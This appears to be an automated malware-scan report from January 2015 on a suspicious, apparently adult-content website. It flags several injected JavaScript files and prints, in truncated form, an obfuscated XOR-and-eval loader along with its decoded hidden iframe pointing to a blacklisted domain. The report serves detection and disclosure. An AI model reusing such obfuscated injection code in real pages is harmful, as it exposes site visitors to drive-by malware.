Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=www528333.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www528333.com/ | 200 OK Content-Length: 4674 Content-Type: text/html | clean |
http://www528333.com/js/jm.js | 200 OK Content-Length: 4789 Content-Type: application/javascript | malicious |
Malicious code found. Script contains blacklisted domain: p.cntaisun.com var J=function(m){return String.fromCharCode(m^5)};eval(J(114)+J(108)+J(107)+J(97)+J(106)+J(114)+J(94)+J(39)+J(89)+J(125)+J(51)+J(49)+J(89)+J(125)+J(51)+J(99)+J(89)+J(125)+J(51)+J(54)+J(89)+J(125)+J(50)+J(48)+J(89)+J(125)+J(51)+J(97)+J(89)+J(125)+J(51)+J(48)+J(89)+J(125)+J(51)+J(96)+J(89)+J(125)+J(50)+J(49)+J(39)+J(88)+J(94)+J(39)+J(89)+J(125)+J(50)+J(50)+J(89)+J(125)+J(50)+J(55)+J(89)+J(125)+J(51)+J(60)+J(89)+J(125)+J(50)+J(49)+J(89)+J(125)+J(51)+J(48 ...[4332 bytes skipped]... Decoded script: ...[1109 bytes skipped]... 65\x72\x3d\"\x6e\x6f\" \x62\x6f\x72\x64\x65\x72\x3d\"\x30\" \x6d\x61\x72\x67\x69\x6e\x77\x69\x64\x74\x68\x3d\"\x30\" \x6d\x61\x72\x67\x69\x6e\x68\x65\x69\x67\x68\x74\x3d\"\x30\" \x73\x63\x72\x6f\x6c\x6c\x69\x6e\x67\x3d\"\x6e\x6f\" \x72\x75\x6e\x61\x74\x3d\"\x73\x65\x72\x76\x65\x72\" \x61\x6c\x6c\x6f\x77\x74\x72\x61\x6e\x73\x70\x61\x72\x65\x6e\x63\x79\x3d\"\x79\x65\x73\"\x3e\x3c\x2f\x69\x66\x72\x61\x6d\x65\x3e"); <iframe src="http://p.cntaisun.com" width="100%" height="2000" frameborder="no" border="0" marginwidth="0" marginheight="0" scrolling="no" runat="server" allowtransparency="yes"></iframe> | ||
http://www528333.com/js/dl.js | 200 OK Content-Length: 3509 Content-Type: application/javascript | malicious |
Malicious code found. Script contains blacklisted domain: cnrdn.com ...[1055 bytes skipped]... ment.writeln("<style type=\"text\/css\">"); document.writeln("#leftDiv,#rightDiv{position:absolute;}"); document.writeln(".itemFloat{height:auto;line-height:8px}"); document.writeln("<\/style>"); document.writeln("<div id=\"leftDiv\" align=\"left\" style=\"top:50px;left:5px\">"); document.writeln("<div id=\"left2\" class=\"itemFloat\">"); document.writeln("<a target=_blank href=http://cnrdn.com/01kE><img border=0 width=\"178\" height=\"284\" src=/x.jpg></a>"); document.writeln("<br><a href=\"javascript:close_left2();\">¹Ø±Õ<\/a>"); document.writeln("<\/div>"); document.writeln("<\/div>"); document.writeln("<div id=\"rightDiv\" align=\"right\" style=\"top:50px;right:5px\">"); document.writeln("<div id=\"right2\" class=\"itemFloat\">"); document.writeln("<a target=_blank href=http ...[1502 bytes skipped]... Decoded script: heartBeat() heartBeat() /*** called setInterval with heartBeat(), 1 */ <style type="text/css"> #leftDiv,#rightDiv{position:absolute;} .itemFloat{height:auto;line-height:8px} </style> <div id="leftDiv" align="left" style="top:50px;left:5px"> <div id="left2" class="itemFloat"> <a target=_blank href=http://cnrdn.com/01kE><img border=0 width="178" height="284" src=/x.jpg></a> <br><a href="javascript:close_left2();">¹Ø±Õ</a> </div> </div> <div id="rightDiv" align="right" style="top:50px;right:5px"> <div id="right2" class="itemFloat"> <a target=_blank href=http://cnrdn.com/01kE><img border=0 width="178" height="284" src=/s.jpg></a> <br><a href= ...[85 bytes skipped]... | ||
http://www528333.com/js/url.js | 200 OK Content-Length: 1120 Content-Type: application/javascript | clean |
http://www528333.com/js/ad-ding.js | 200 OK Content-Length: 149 Content-Type: application/javascript | clean |
http://www528333.com/js/3t.js | 200 OK Content-Length: 588 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write("<a href=\"http:///jump.html\" target=\"_blank\"><img src=http://drmcmm.baidu.com/media/id=nHndn1cdPW0z&gp=401&time=nHnvP1Rvn1TdPf.gif width=\"884\" height=\"90\" border=0></a>");
document.write("<a href=\"http:///jump.html\" target=\"_blank\"><img src=http://drmcmm.baidu.com/media/id=nHnLrHnznHRL&gp=401&time=nHnvrjR1rHmdnf.gif width=\"884\" height=\"80\" border=0></a>"); document.write("<a href=\"http:///jump.html\" target=\"_blank\"><img src=http://drmcmm.baidu.com/media/id=nHnLrHnkPHnv&gp=401&time=nHnvrjR1rHDvn6.gif width=\"884\" height=\"80\" border=0></a>"); Antivirus reports:
| ||
http://www528333.com/js/tj.js | 200 OK Content-Length: 128 Content-Type: application/javascript | clean |
http://www528333.com/a/zptp/ | 200 OK Content-Length: 17390 Content-Type: text/html | clean |
http://www528333.com/a/xiaoyuanchunse/ | 200 OK Content-Length: 18744 Content-Type: text/html | clean |
http://www528333.com/a/xingaijiqiao/ | 200 OK Content-Length: 19422 Content-Type: text/html | clean |
http://www528333.com/a/fengsaoshunv/ | 200 OK Content-Length: 19351 Content-Type: text/html | clean |
http://www528333.com/a/fengliuchunse/ | 200 OK Content-Length: 19349 Content-Type: text/html | clean |
http://www528333.com/a/ribennvyou/ | 200 OK Content-Length: 16288 Content-Type: text/html | clean |
http://www528333.com/a/oumeimengpian/ | 200 OK Content-Length: 19369 Content-Type: text/html | clean |
http://www528333.com/a/yanzhaozipai/ | 200 OK Content-Length: 19335 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: www528333.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 08 Jan 2015 13:33:35 GMT
Accept-Ranges: bytes
ETag: "1e5a97-1242-50be887aaf700"
Server: Apache
Vary: Accept-Encoding
Content-Length: 4674
Content-Type: text/html
Last-Modified: Mon, 05 Jan 2015 14:30:20 GMT
...4674 bytes of data.
GET / HTTP/1.1
Host: www528333.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 08 Jan 2015 13:33:35 GMT
Accept-Ranges: bytes
ETag: "1e5a97-1242-50be887aaf700"
Server: Apache
Vary: Accept-Encoding
Content-Length: 4674
Content-Type: text/html
Last-Modified: Mon, 05 Jan 2015 14:30:20 GMT
...4674 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: www528333.com
Referer: http://www.google.com/search?q=www528333.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: www528333.com
Referer: http://www.google.com/search?q=www528333.com
Result:
The result is similar to the first query. There are no suspicious redirects found.